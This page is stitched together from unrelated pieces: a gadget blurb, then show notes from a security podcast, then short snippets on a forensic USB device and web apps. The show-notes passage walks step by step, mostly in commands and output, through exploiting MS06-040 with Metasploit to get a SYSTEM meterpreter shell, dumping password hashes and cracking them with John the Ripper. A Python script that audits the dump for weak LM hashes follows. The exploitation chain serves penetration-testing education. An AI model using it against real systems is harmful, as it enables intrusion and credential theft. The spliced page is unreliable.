Filed under: Home Entertainment, Portable Audio
Nothing says sexy like a sleek wood trim, wouldn’t you wholeheartedly agree? Vita Audio obviously does, as its £499.99 ($980) R4 integrated music system just screams lavish. The all-in-one unit packs an iPod dock, slot-loading CD / MP3 / WMA-music disc player, USB port, DAB and FM tuner with RDS, front and rear auxiliary ports, built-in display, alarm clock function and the firm’s detachable RotoDial remote. For those not feeling the rich walnut veneer, there’s also a high-gloss white (surprised?) version available for £50 ($97) more. Sadly, the “coming soon” tidbit leaves us clueless as to how long you actually have left to save up for either of the pricey systems.
[Via ShinyShiny]
Episode 106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X; Ron will be emailing me as soon as he listens to the show 🙂) I run nessuscmd, tell it to OS fingerprint with -O, print out a full report with -V, use plugin ID 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and test host 192.168.10.139.
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139
It reports:
Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409
Sweet, I love vulnerabilities! They are sexy and exciting, especially MS06-040, because it’s just so delicious and begging to be devoured by metasploit. I have metasploit 3.1 installed in OS X:
/framework-3.1/trunk gordon$ ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 62 aux
I want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
I then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139
Here is what my options look like:
msf exploit(ms06_040_netapi) > show options
Module options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST    192.168.10.139   yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options:
Name      Current Setting                                                    Required  Description
----      ---------------                                                    --------  -----------
DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll      yes       The local path to the DLL to upload
EXITFUNC  thread                                                             yes       Exit technique: seh, thread, process
LPORT     4444                                                               yes       The local port
Exploit target:
Id  Name
--  ----
0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)
Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)
To access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
So then I copy and paste those results into my other directory with John the Ripper installed:
paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted
W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!
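Why John finished in two seconds can be read straight off the dump: LM hashes each 7-character half of the password separately, so stored LM values and empty halves stand out. The audit below is an added example, not part of the original show notes; the function names are hypothetical and the sample records are copied from the hashdump output above.

```python
import re

# Well-known constants: the LM hash of an empty 7-byte half and the NT hash
# of the empty string. Both values also appear in the dump on this page.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"[0-9a-f]{32}")

# Constructed sample: records copied from the hashdump output on this page,
# including one whose hash fields the page shows redacted as "EDIT".
SAMPLE_DUMP = """\
Administrator:500:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
"""

def audit_line(line):
    """Return (user, rid, findings) for one user:rid:lm:nt::: record."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError("not a pwdump-style record: %r" % line)
    user, rid, lm, nt = fields[0], fields[1], fields[2].lower(), fields[3].lower()
    if not (HEX32.fullmatch(lm) and HEX32.fullmatch(nt)):
        return user, rid, ["unparsed"]      # redacted or malformed hash fields
    findings = []
    if nt == EMPTY_NT:
        findings.append("blank-password")
    if lm[:16] != EMPTY_LM_HALF:
        findings.append("lm-hash-stored")
        # An empty second half proves the password is at most 7 characters,
        # and LM upper-cases it before hashing, which shrinks the search space.
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password-7-chars-or-fewer")
    return user, rid, findings

def audit_dump(text):
    """Audit every non-empty line of a dump; returns {user: findings}."""
    records = map(audit_line, filter(str.strip, text.splitlines()))
    return {user: findings for user, _, findings in records}

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print("%-18s %s" % (user, ", ".join(findings) or "ok"))
```

Accounts flagged `lm-hash-stored` stop being flagged once the "Network security: Do not store LAN Manager hash value on next password change" policy (the NoLMHash registry value) is enabled and the password is changed.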
Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.
“This is cool but also sucks”
The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June.
The next generation of web apps makes heavy use of JavaScript and CSS. We’ll show you how to make those apps responsive and quick.